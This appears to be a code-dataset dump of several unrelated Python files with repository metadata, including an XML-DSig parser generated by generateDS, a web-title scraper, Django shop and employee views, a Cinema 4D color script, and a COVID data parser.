nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Target', node)
if value is not None and 'Target' not in already_processed:
already_processed.add('Target')
self.Target = value
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
# end class SignaturePropertyType
class DSAKeyValueType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, P=None, Q=None, G=None, Y=None, J=None, Seed=None, PgenCounter=None):
self.P = P
self.Q = Q
self.G = G
self.Y = Y
self.J = J
self.Seed = Seed
self.PgenCounter = PgenCounter
def factory(*args_, **kwargs_):
if DSAKeyValueType.subclass:
return DSAKeyValueType.subclass(*args_, **kwargs_)
else:
return DSAKeyValueType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_P(self): return self.P
def set_P(self, P): self.P = P
def get_Q(self): return self.Q
def set_Q(self, Q): self.Q = Q
def get_G(self): return self.G
def set_G(self, G): self.G = G
def get_Y(self): return self.Y
def set_Y(self, Y): self.Y = Y
def get_J(self): return self.J
def set_J(self, J): self.J = J
def get_Seed(self): return self.Seed
def set_Seed(self, Seed): self.Seed = Seed
def get_PgenCounter(self): return self.PgenCounter
def set_PgenCounter(self, PgenCounter): self.PgenCounter = PgenCounter
def validate_CryptoBinary(self, value):
# Validate type CryptoBinary, a restriction on base64Binary.
pass
def hasContent_(self):
if (
self.P is not None or
self.Q is not None or
self.G is not None or
self.Y is not None or
self.J is not None or
self.Seed is not None or
self.PgenCounter is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='DSAKeyValueType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='DSAKeyValueType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='DSAKeyValueType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='DSAKeyValueType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.P is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sP>%s</%sP>%s' % (namespace_, self.gds_format_base64(self.P, input_name='P'), namespace_, eol_))
if self.Q is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sQ>%s</%sQ>%s' % (namespace_, self.gds_format_base64(self.Q, input_name='Q'), namespace_, eol_))
if self.G is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sG>%s</%sG>%s' % (namespace_, self.gds_format_base64(self.G, input_name='G'), namespace_, eol_))
if self.Y is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sY>%s</%sY>%s' % (namespace_, self.gds_format_base64(self.Y, input_name='Y'), namespace_, eol_))
if self.J is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sJ>%s</%sJ>%s' % (namespace_, self.gds_format_base64(self.J, input_name='J'), namespace_, eol_))
if self.Seed is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sSeed>%s</%sSeed>%s' % (namespace_, self.gds_format_base64(self.Seed, input_name='Seed'), namespace_, eol_))
if self.PgenCounter is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sPgenCounter>%s</%sPgenCounter>%s' % (namespace_, self.gds_format_base64(self.PgenCounter, input_name='PgenCounter'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='DSAKeyValueType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.P is not None:
showIndent(outfile, level)
outfile.write('P=model_.base64Binary(\n')
self.P.exportLiteral(outfile, level, name_='P')
showIndent(outfile, level)
outfile.write('),\n')
if self.Q is not None:
showIndent(outfile, level)
outfile.write('Q=model_.base64Binary(\n')
self.Q.exportLiteral(outfile, level, name_='Q')
showIndent(outfile, level)
outfile.write('),\n')
if self.G is not None:
showIndent(outfile, level)
outfile.write('G=model_.base64Binary(\n')
self.G.exportLiteral(outfile, level, name_='G')
showIndent(outfile, level)
outfile.write('),\n')
if self.Y is not None:
showIndent(outfile, level)
outfile.write('Y=model_.base64Binary(\n')
self.Y.exportLiteral(outfile, level, name_='Y')
showIndent(outfile, level)
outfile.write('),\n')
if self.J is not None:
showIndent(outfile, level)
outfile.write('J=model_.base64Binary(\n')
self.J.exportLiteral(outfile, level, name_='J')
showIndent(outfile, level)
outfile.write('),\n')
if self.Seed is not None:
showIndent(outfile, level)
outfile.write('Seed=model_.base64Binary(\n')
self.Seed.exportLiteral(outfile, level, name_='Seed')
showIndent(outfile, level)
outfile.write('),\n')
if self.PgenCounter is not None:
showIndent(outfile, level)
outfile.write('PgenCounter=model_.base64Binary(\n')
self.PgenCounter.exportLiteral(outfile, level, name_='PgenCounter')
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'P':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'P')
else:
bval_ = None
self.P = bval_
self.validate_CryptoBinary(self.P) # validate type CryptoBinary
elif nodeName_ == 'Q':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Q')
else:
bval_ = None
self.Q = bval_
self.validate_CryptoBinary(self.Q) # validate type CryptoBinary
elif nodeName_ == 'G':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'G')
else:
bval_ = None
self.G = bval_
self.validate_CryptoBinary(self.G) # validate type CryptoBinary
elif nodeName_ == 'Y':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Y')
else:
bval_ = None
self.Y = bval_
self.validate_CryptoBinary(self.Y) # validate type CryptoBinary
elif nodeName_ == 'J':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'J')
else:
bval_ = None
self.J = bval_
self.validate_CryptoBinary(self.J) # validate type CryptoBinary
elif nodeName_ == 'Seed':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Seed')
else:
bval_ = None
self.Seed = bval_
self.validate_CryptoBinary(self.Seed) # validate type CryptoBinary
elif nodeName_ == 'PgenCounter':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'PgenCounter')
else:
bval_ = None
self.PgenCounter = bval_
self.validate_CryptoBinary(self.PgenCounter) # validate type CryptoBinary
# end class DSAKeyValueType
class RSAKeyValueType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Modulus=None, Exponent=None):
self.Modulus = Modulus
self.Exponent = Exponent
def factory(*args_, **kwargs_):
if RSAKeyValueType.subclass:
return RSAKeyValueType.subclass(*args_, **kwargs_)
else:
return RSAKeyValueType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Modulus(self): return self.Modulus
def set_Modulus(self, Modulus): self.Modulus = Modulus
def get_Exponent(self): return self.Exponent
def set_Exponent(self, Exponent): self.Exponent = Exponent
def validate_CryptoBinary(self, value):
# Validate type CryptoBinary, a restriction on base64Binary.
pass
def hasContent_(self):
if (
self.Modulus is not None or
self.Exponent is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ds:', name_='RSAKeyValueType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='RSAKeyValueType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ds:', name_='RSAKeyValueType'):
pass
def exportChildren(self, outfile, level, namespace_='ds:', name_='RSAKeyValueType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Modulus is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sModulus>%s</%sModulus>%s' % (namespace_, self.gds_format_base64(self.Modulus, input_name='Modulus'), namespace_, eol_))
if self.Exponent is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sExponent>%s</%sExponent>%s' % (namespace_, self.gds_format_base64(self.Exponent, input_name='Exponent'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='RSAKeyValueType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.Modulus is not None:
showIndent(outfile, level)
outfile.write('Modulus=model_.base64Binary(\n')
self.Modulus.exportLiteral(outfile, level, name_='Modulus')
showIndent(outfile, level)
outfile.write('),\n')
if self.Exponent is not None:
showIndent(outfile, level)
outfile.write('Exponent=model_.base64Binary(\n')
self.Exponent.exportLiteral(outfile, level, name_='Exponent')
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Modulus':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Modulus')
else:
bval_ = None
self.Modulus = bval_
self.validate_CryptoBinary(self.Modulus) # validate type CryptoBinary
elif nodeName_ == 'Exponent':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError), exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Exponent')
else:
bval_ = None
self.Exponent = bval_
self.validate_CryptoBinary(self.Exponent) # validate type CryptoBinary
# end class RSAKeyValueType
GDSClassesMapping = {
'PGPData': PGPDataType,
'Transform': TransformType,
'X509IssuerSerial': X509IssuerSerialType,
'SignatureMethod': SignatureMethodType,
'SPKIData': SPKIDataType,
'SignatureProperty': SignaturePropertyType,
'Object': ObjectType,
'X509Data': X509DataType,
'DigestMethod': DigestMethodType,
'KeyValue': KeyValueType,
'CanonicalizationMethod': CanonicalizationMethodType,
'SignatureProperties': SignaturePropertiesType,
'KeyInfo': KeyInfoType,
'Manifest': ManifestType,
'RSAKeyValue': RSAKeyValueType,
'Signature': SignatureType,
'RetrievalMethod': RetrievalMethodType,
'DSAKeyValue': DSAKeyValueType,
'Reference': ReferenceType,
'Transforms': TransformsType,
'SignedInfo': SignedInfoType,
'SignatureValue': SignatureValueType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName, silence=False):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Signature'
rootClass = SignatureType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:ds="http://www.w3.org/2000/09/xmldsig#"',
pretty_print=True)
return rootObj
def parseEtree(inFileName, silence=False):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Signature'
rootClass = SignatureType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
if not silence:
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
roots = get_root_tag(rootNode)
rootClass = roots[1]
if rootClass is None:
rootClass = SignatureType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_="Signature",
namespacedef_='xmlns:ds="http://www.w3.org/2000/09/xmldsig#"')
return rootObj
def parseLiteral(inFileName, silence=False):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'Signature'
rootClass = SignatureType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('#from xmldsig-core-schema_v01 import *\n\n')
sys.stdout.write('import xmldsig-core-schema_v01 as model_\n\n')
sys.stdout.write('rootObj = model_.rootTag(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"CanonicalizationMethodType",
"DSAKeyValueType",
"DigestMethodType",
"KeyInfoType",
"KeyValueType",
"ManifestType",
"ObjectType",
"PGPDataType",
"RSAKeyValueType",
"ReferenceType",
"RetrievalMethodType",
"SPKIDataType",
"SignatureMethodType",
"SignaturePropertiesType",
"SignaturePropertyType",
"SignatureType",
"SignatureValueType",
"SignedInfoType",
"TransformType",
"TransformsType",
"X509DataType",
"X509IssuerSerialType"
]
| [
"[email protected]"
] | |
06d81819ec245e77cec949f12a8b70ffb0617810 | 9431bba2d148f8aef9c0a8f3ca16fcf875890757 | /scraping/get_html_title.py | 9f5573db2266ed5c6d715cae3af9936cb85faae6 | [
"MIT"
] | permissive | terasakisatoshi/pythonCodes | fba0b78414b2c85f4a738200354ea583f0516768 | 953210c06e9885a7c885bc01047715a77de08a1a | refs/heads/master | 2023-05-14T12:30:22.201711 | 2023-05-07T13:41:22 | 2023-05-07T13:41:22 | 197,893,702 | 2 | 1 | MIT | 2022-11-25T10:59:52 | 2019-07-20T07:09:12 | Jupyter Notebook | UTF-8 | Python | false | false | 603 | py | from urllib.request import urlopen
from urllib.error import HTTPError
from bs4 import BeautifulSoup
def get_title(url):
try:
html = urlopen(url)
except HTTPError as e:
print(e)
return None
try:
bsoup = BeautifulSoup(html.read())
title = bsoup.body.h1
except AttributeError as e:
return None
return title
def main():
URL="http://www.pythonscraping.com/pages/page1.html"
title=get_title(URL)
if title==None:
print("Title could not be found")
else:
print(title)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
c822f6ed07953bee56d648fff611aea04680c407 | 366b2ff9cd498808438bf7c48f697c05b361d02c | /models.py | 0606075241f9749a7ff176655dadf12a115be600 | [] | no_license | c-bata/AngularJS-Bottle-TodoApp | 1aef6b09fd85fabaa63898ab3fb9a2d586216b93 | 8f03820b7949b0c28477970c58f25ccd1856b2a9 | refs/heads/master | 2021-03-12T22:40:32.000758 | 2015-11-04T11:14:47 | 2015-11-04T11:14:47 | 38,732,944 | 2 | 0 | null | 2015-11-04T11:11:39 | 2015-07-08T05:02:47 | Python | UTF-8 | Python | false | false | 1,225 | py | from datetime import datetime
from sqlalchemy import (
Column, Integer, Unicode, UnicodeText, Boolean, DateTime,
create_engine
)
from sqlalchemy.ext import declarative
from bottle.ext import sqlalchemy
Base = declarative.declarative_base()
engine = create_engine('sqlite:///:memory:', echo=True)
plugin = sqlalchemy.Plugin(
engine,
Base.metadata,
keyword='db', # 関数内で挿入される変数名
create=True, # テーブルを作成するか
commit=True, # 関数終了時にトランザクションをコミットするか
use_kwargs=False
)
class Task(Base):
__tablename__ = 'tasks'
id = Column(Integer, primary_key=True)
title = Column(Unicode(255), nullable=False)
memo = Column(UnicodeText)
done = Column(Boolean, nullable=False, default=False)
created_at = Column(DateTime, default=datetime.now(), nullable=False)
def __repr__(self):
return "<Task (title='%s')>" % self.title
@property
def serialize(self):
return {
'id': self.id,
'title': self.title,
'memo': self.memo,
'done': self.done,
'created_at': self.created_at.strftime('%Y-%m-%d')
}
| [
"[email protected]"
] | |
7466229e21a1f6ba95a9a8ae72f30c4c238f16fe | 9ecf6cfdc15b704b44688c533c5c6e9eccc5c0ab | /randomise-selected-objects-color.py | 181f6e92a57894fc3a910c380826c7c07f9afaf0 | [] | no_license | Bordilovskii/cinema4d-scripts | 96b1eab6aa442ef6ead105d22e0bab352d8563c9 | 811be702a64c8b0c97dedbbf95723ce0af06a7fa | refs/heads/master | 2020-03-27T06:37:25.692966 | 2018-07-04T09:30:18 | 2018-07-04T09:30:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | import c4d
import random as rand
def main():
doc.StartUndo()
objs = doc.GetActiveObjects(0)
if len(objs) == 0:return
for obj in objs:
doc.AddUndo(c4d.UNDOTYPE_CHANGE,obj)
obj[c4d.ID_BASEOBJECT_USECOLOR] = 2
r = rand.random()
g = rand.random()
b = rand.random()
doc.AddUndo(c4d.UNDOTYPE_CHANGE,obj)
obj[c4d.ID_BASEOBJECT_COLOR] = c4d.Vector(r,g,b)
c4d.EventAdd()
doc.EndUndo()
if __name__=='__main__':
main() | [
"[email protected]"
] | |
24cdb1982f2fe439f8411d943177ebf9d46ba73e | 8d6ec0275afe856834bf10643e3b4b2cbcb318f4 | /03-online-shop/myshop/shop/views.py | 93982ce741c0abec344a2ff2ddd5db46f5ee1ff2 | [] | no_license | markronquillo/django-by-example | be35fbbc483440a11c440733931c146d56816c97 | fa749e5077f64ac68f11c7b529e13ac097cb5bd0 | refs/heads/master | 2021-01-11T14:38:40.854636 | 2017-02-24T03:09:58 | 2017-02-24T03:09:58 | 80,184,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | from django.shortcuts import render, get_object_or_404
from .models import Category, Product
from cart.forms import CartAddProductForm
def product_list(request, category_slug=None):
category = None
categories = Category.objects.all()
products = Product.objects.filter(available=True)
if category_slug:
category = get_object_or_404(Category, slug=category_slug)
products = products.filter(category=category)
return render(request,
'shop/product/list.html',
{'category': category,
'categories': categories,
'products': products})
def product_detail(request, id, slug):
product = get_object_or_404(Product,
id=id,
slug=slug,
available=True)
cart_product_form = CartAddProductForm()
return render(request,
'shop/product/detail.html',
{'product': product,
'cart_product_form': cart_product_form})
| [
"[email protected]"
] | |
1fcb488242e10d0c03422d74916f668b21eb791b | 0e69513ca0fda765b5f655c4405aafb209491389 | /input/parse_pcm-dpc_it.py | 4492610a839245b4948d341f93c7abb1d5d1c339 | [] | no_license | adrianrequena/covid19 | 57a54fdaec79c0d1d57de63810e3337513e87b2f | a13cb2c117a68de2740702831f84c17049aa95ab | refs/heads/master | 2023-07-20T01:49:44.583897 | 2020-04-01T19:19:21 | 2020-04-01T19:19:21 | 252,279,864 | 0 | 0 | null | 2023-07-06T21:57:02 | 2020-04-01T20:28:35 | Python | UTF-8 | Python | false | false | 1,687 | py | #!/usr/bin/env python
import os
import sys
from pathlib import Path
from datetime import datetime, timedelta
import pandas
from utils import \
parse_level_args, github_raw_dataframe, github_raw_url, dataframe_output, merge_previous
# Root path of the project
ROOT = Path(os.path.dirname(__file__)) / '..'
# This script can parse both region-level and country-level data
is_region = parse_level_args(sys.argv[1:]).level == 'region'
if is_region:
df = github_raw_dataframe(
'pcm-dpc/COVID-19', 'dati-json/dpc-covid19-ita-regioni.json', orient='records')
else:
df = github_raw_dataframe(
'pcm-dpc/COVID-19', 'dati-json/dpc-covid19-ita-andamento-nazionale.json', orient='records')
df = df.rename(columns={
'data': 'Date',
'totale_casi': 'Confirmed',
'deceduti': 'Deaths',
'tamponi': 'Tested'
})
if is_region:
df['_RegionLabel'] = df['denominazione_regione']
# Parse date into a datetime object
df['Date'] = df['Date'].apply(lambda date: datetime.fromisoformat(date).date())
# Offset date by 1 day to match ECDC report
if not is_region:
df['RegionCode'] = None
df['Date'] = df['Date'].apply(lambda date: date + timedelta(days=1))
# Convert dates to ISO format
df['Date'] = df['Date'].apply(lambda date: date.isoformat())
# Add the country code to all records
df['CountryCode'] = 'IT'
# Merge the new data with the existing data (prefer new data if duplicates)
if not is_region:
filter_function = lambda row: row['CountryCode'] == 'IT' and pandas.isna(row['RegionCode'])
df = merge_previous(df, ['Date', 'CountryCode'], filter_function)
# Output the results
dataframe_output(df, ROOT, 'IT' if is_region else None) | [
"[email protected]"
] | |
43a3171c18f24f3e5cf493bcf8576ddb6b9456b6 | ebd2df05eae5875f3edd5c891442b9fe1f3d54ee | /empleados/views.py | 3b8388bd33952007db18e34edaecbd69330d2a7c | [] | no_license | gfcarbonell/app_navidad | 06191ef3b084d40c7a5f387a60407406c2c89d54 | fa290f8cf0b4b0d9237b555417fe38f879938adf | refs/heads/master | 2020-12-24T11:54:10.514150 | 2016-11-16T15:37:09 | 2016-11-16T15:37:09 | 73,115,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,364 | py | # -*- encoding: utf-8 -*-
from django.conf import settings
from django.views.generic import CreateView, UpdateView, ListView, DetailView
from .models import Empleado
from .forms import EmpleadoModelForm, EmpleadoUsuarioForm
from django.core.urlresolvers import reverse_lazy
from rest_framework import viewsets
from django.db.models import Q
import socket
from pure_pagination.mixins import PaginationMixin
from django.template.defaultfilters import slugify
from infos_sistemas.mixins import TipoPerfilUsuarioMixin
class EmpleadoCreateView(TipoPerfilUsuarioMixin, CreateView):
template_name = 'empleado_create.html'
form_class = EmpleadoUsuarioForm
model = Empleado
success_url = reverse_lazy('empleado:control')
def form_valid(self, form):
user = form['model_form_usuario'].save(commit=False)
user.usuario_creador = self.request.user
user.ultimo_usuario_editor = user.usuario_creador
try:
user.nombre_host = socket.gethostname()
user.ultimo_nombre_host = user.nombre_host
except:
user.nombre_host = 'localhost'
user.ultimo_nombre_host = user.nombre_host
user.direccion_ip = socket.gethostbyname(socket.gethostname())
user.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
empleado = form['model_form_empleado'].save(commit=False)
empleado.tipo_persona = 'Natural'
if empleado.numero_hijo is None:
empleado.numero_hijo = 0
user.save()
empleado.usuario = user
empleado.usuario_creador = self.request.user
empleado.ultimo_usuario_editor = empleado.usuario_creador
try:
empleado.nombre_host = socket.gethostname()
empleado.ultimo_nombre_host = empleado.nombre_host
except:
empleado.nombre_host = 'localhost'
empleado.ultimo_nombre_host = empleado.nombre_host
empleado.direccion_ip = socket.gethostbyname(socket.gethostname())
empleado.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
empleado.save()
return super(EmpleadoCreateView, self).form_valid(form)
class EmpleadoUpdate(TipoPerfilUsuarioMixin, UpdateView):
form_class = EmpleadoModelForm
success_url = reverse_lazy('empleado:control')
template_name = 'empleado_update.html'
queryset = Empleado.objects.all()
def form_valid(self, form):
self.object = form.save(commit=False)
if self.object.numero_hijo is None:
self.object.numero_hijo = 0
self.object.ultimo_usuario_editor = self.request.user
try:
self.object.ultimo_nombre_host = socket.gethostname()
except:
self.object.ultimo_nombre_host = 'localhost'
self.object.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
self.object.save()
return super(EmpleadoUpdate, self).form_valid(form)
class EmpleadoUsuarioUpdateView(TipoPerfilUsuarioMixin, UpdateView):
form_class = EmpleadoUsuarioForm
success_url = reverse_lazy('empleado:control')
template_name = 'empleado_usuario_update.html'
queryset = Empleado.objects.all()
def get_context_data(self, **kwarg):
context = super(EmpleadoUpdateView, self).get_context_data(**kwarg)
empleado = self.queryset.get(slug__contains=self.kwargs['slug'])
data = {'empleado':empleado}
context.update(data)
return context
def get_form_kwargs(self):
kwargs = super(EmpleadoUpdateView, self).get_form_kwargs()
kwargs.update(instance={
'model_form_empleado': self.object,
'model_form_usuario': self.object.usuario,
})
return kwargs
def form_valid(self, form):
empleado = self.queryset.get(slug__contains=self.kwargs['slug'])
user = form['model_form_usuario'].save(commit=False)
user = empleado.usuario
user.ultimo_usuario_editor = self.request.user
try:
user.ultimo_nombre_host = user.nombre_host
except:
user.ultimo_nombre_host = user.nombre_host
user.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
empleado = form['model_form_empleado'].save(commit=False)
empleado.tipo_persona = 'Natural'
if empleado.numero_hijo is None:
empleado.numero_hijo = 0
user.save()
empleado.usuario = user
empleado.ultimo_usuario_editor = self.request.user
try:
empleado.ultimo_nombre_host = empleado.nombre_host
except:
empleado.ultimo_nombre_host = empleado.nombre_host
empleado.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())
empleado.save()
return super(EmpleadoUpdateView, self).form_valid(form)
class EmpleadoDetailView(TipoPerfilUsuarioMixin, DetailView):
template_name = 'empleado_detail.html'
model = Empleado
queryset = Empleado.objects.all()
class EmpleadoControlListView(PaginationMixin, TipoPerfilUsuarioMixin, ListView):
model = Empleado
template_name = 'empleados.html'
paginate_by = 10
def get_context_data(self, **kwarg):
context = super(EmpleadoControlListView, self).get_context_data(**kwarg)
boton_menu = False
total_registro = self.model.objects.count()
data = {
'boton_menu' : boton_menu,
'total_registro': total_registro,
}
context.update(data)
return context
def get(self, request, *args, **kwargs):
if request.GET.get('search_registro', None):
self.object_list = self.get_queryset()
context = self.get_context_data()
return self.render_to_response(context)
else:
return super(EmpleadoControlListView, self).get(self, request, *args, **kwargs)
def get_queryset(self):
if self.request.GET.get('search_registro', None):
value = self.request.GET.get('search_registro', None)
queryset = self.model.objects.filter(Q(slug__icontains=slugify(value)))
else:
queryset = super(EmpleadoControlListView, self).get_queryset()
return queryset
| [
"[email protected]"
] | |
26dace9da5168c53db1423f65ab53c70e82b7187 | d131ad1baf891a2918ae27b0dc57f3c0c1f99586 | /blog/migrations/0001_initial.py | ec6923c8ffb8cbccaa6e420a5a387c7af1f5ae91 | [] | no_license | Alymbekov/TestProjectForDjangoForms | d3bf24844628136f9236d5222d32235e87f7aecd | ce3262e7565e293b691ea70b94b67155c15525bd | refs/heads/master | 2020-04-10T05:35:19.516127 | 2018-12-07T14:24:05 | 2018-12-07T14:24:05 | 160,832,149 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | # Generated by Django 2.1 on 2018-11-18 08:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(db_index=True, max_length=150)),
('slug', models.SlugField(max_length=150, unique=True)),
('body', models.TextField(blank=True, db_index=True)),
('date_pub', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"[email protected]"
] | |
